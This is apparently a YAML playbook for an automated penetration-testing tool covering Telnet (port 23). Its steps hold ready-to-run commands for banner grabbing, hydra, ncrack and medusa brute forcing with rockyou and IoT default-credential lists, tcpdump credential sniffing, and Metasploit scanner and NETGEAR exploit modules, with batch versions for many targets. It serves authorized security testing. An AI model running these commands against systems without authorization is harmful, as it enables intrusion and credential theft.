id: telnet_pentesting
name: Telnet Penetration Testing (Port 23)
description: Comprehensive Telnet enumeration, credential sniffing, and exploitation based on HackTricks methodology
category: enumeration
risk_level: medium
batch_compatible: true

triggers:
  - id: trigger_telnet_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [23, 2323] }
      protocol: { "$in": ["telnet", "tcp"] }
    required_count: 1
    priority: 3
    description: Triggers when Telnet service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: telnet_banner_grab
    name: Telnet Banner Grabbing
    description: Identify Telnet server version and capabilities
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -n -sV -Pn --script '*telnet*' -p {port} {host} -oN telnet_banner_{host}.txt"
        preferred: true
        notes: "Extract Telnet server banner and enumerate options"
        requires_elevation: false
      - tool: nc
        platforms: [linux, macos]
        command: "nc -vn {host} {port}"
        preferred: true
        notes: "Simple banner grab with netcat"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script telnet-ntlm-info {host}"
        preferred: false
        notes: "Extract NTLM information (Windows versions)"
        requires_elevation: false

  - id: telnet_brute_force
    name: Telnet Authentication Brute Force
    description: Brute force Telnet credentials
    order: 2
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -f telnet://{host}"
        preferred: true
        notes: "Telnet credential brute forcing (stop at first valid login)"
        requires_elevation: false
      - tool: ncrack
        platforms: [linux, macos, windows]
        command: "ncrack -p {port} --user admin -P /usr/share/wordlists/rockyou.txt --connection-limit 4 {host}"
        preferred: false
        notes: "Fast Telnet authentication cracker"
        requires_elevation: false
      - tool: medusa
        platforms: [linux, macos, windows]
        command: "medusa -M telnet -h {host} -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -t 6 -f"
        preferred: false
        notes: "Parallel Telnet brute forcing"
        requires_elevation: false

  - id: telnet_vulnerability_scan
    name: Telnet Vulnerability Scanning
    description: Scan for known Telnet vulnerabilities
    order: 3
    timeout_seconds: 180
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {host}; set RPORT {port}; run; exit'"
        preferred: true
        notes: "Telnet version detection and banner enumeration"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {host}; set RPORT {port}; run; exit'"
        preferred: false
        notes: "Check for Solaris 9/10 Telnet ENCRYPT overflow (RCE)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {host}; set RPORT {port}; run; exit'"
        preferred: false
        notes: "RuggedCom Telnet password disclosure"
        requires_elevation: false

  - id: telnet_credential_sniffing
    name: Telnet Credential Sniffing
    description: Capture cleartext Telnet credentials from network traffic
    order: 4
    timeout_seconds: 300
    commands:
      - tool: tcpdump
        platforms: [linux, macos]
        command: "sudo tcpdump -i eth0 -A 'tcp port {port} and not src host $(hostname -I | cut -d' ' -f1)' -w telnet_capture_{host}.pcap"
        preferred: true
        notes: "Capture Telnet traffic (credentials in cleartext)"
        requires_elevation: true
      - tool: wireshark
        platforms: [linux, macos, windows]
        command: "wireshark -i eth0 -f 'tcp port {port}'"
        preferred: false
        notes: "Live Telnet traffic capture and analysis (filter: tcp.port == 23)"
        requires_elevation: false

  - id: telnet_iot_default_creds
    name: Telnet IoT Default Credentials
    description: Test common IoT device default credentials
    order: 5
    timeout_seconds: 120
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -C /usr/share/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt telnet://{host} -t 4"
        preferred: true
        notes: "Test IoT/embedded device default credentials (Mirai botnet targets)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {host}; set RPORT {port}; run; exit'"
        preferred: false
        notes: "Brocade device default credential testing"
        requires_elevation: false

  - id: telnet_recent_cves
    name: Telnet Recent CVE Exploitation
    description: Test for recent Telnet vulnerabilities (2022-2025)
    order: 6
    timeout_seconds: 180
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script telnet-encryption {host}"
        preferred: true
        notes: "Check for CVE-2022-39028 (inetutils telnetd DoS)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/linux/mips/netgear_telnetenable; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "NETGEAR router Telnet enable exploit"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - hydra
    - ncrack
    - medusa
    - metasploit
    - tcpdump
    - wireshark
  cves:
    - CVE-2024-45698  # D-Link DIR-X4860 Telnet RCE with hard-coded credentials
    - CVE-2023-40478  # NETGEAR RAX30 buffer overflow in Telnet CLI
    - CVE-2022-39028  # GNU inetutils telnetd NULL pointer dereference DoS
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-telnet
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45698
  techniques:
    - Cleartext credential sniffing
    - IoT default credential exploitation
    - Man-in-the-middle attacks
    - Mirai botnet credential lists
  batch_commands:
    hydra: "hydra -L users.txt -P passwords.txt -M {targets_file} telnet -t 4"
    nmap_enum: "nmap -p 23 --script 'telnet*' -iL {targets_file} -oN telnet_scan.txt"
  notes: |
    IMPORTANT SECURITY NOTES:
    - Telnet transmits ALL data (including passwords) in CLEARTEXT
    - Always prefer SSH over Telnet for secure remote access
    - Many IoT devices still use Telnet with default/weak credentials
    - Mirai botnet variants actively scan port 23 for vulnerable devices
